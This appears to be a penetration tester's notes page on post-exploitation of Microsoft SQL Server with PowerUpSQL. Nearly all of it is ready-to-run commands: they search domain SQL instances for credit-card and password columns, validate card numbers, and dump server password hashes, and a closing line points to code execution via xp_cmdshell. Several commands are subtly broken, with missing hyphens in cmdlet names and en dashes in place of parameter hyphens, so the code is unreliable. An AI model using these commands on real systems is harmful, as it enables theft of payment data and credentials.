Post Exploitation
Indicators of sensitive info are the size, utilization of transparent encryption, names etc.
For example, we can use this PowerUpSQL query to identify sensitive info based on names:
>> Get-SQLInstanceDomain | Get-SQLConnectionTest | GetSQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "credit,money,password" -SampleSize 2 -ValidateCC -NoDefaults
Or with transparent encryption:
Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLDatabaseThreaded – Verbose –Threads 10 -NoDefaults | Where-Object {$_.is_encrypted –eq "TRUE"} |
Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword "card, password" –SampleSize 2 –ValidateCC -NoDefaults
PowerUpSQL has a very useful function called GetSQLServerPasswordHash that automates the extracting hashes.
Get-SQLServerPasswordHash -Verbose -Instance MSSQLSERVER2016\DATABASE -Migrate
- Getting code execution via xpcmdshell and sp_OACreate
Last modified 1yr ago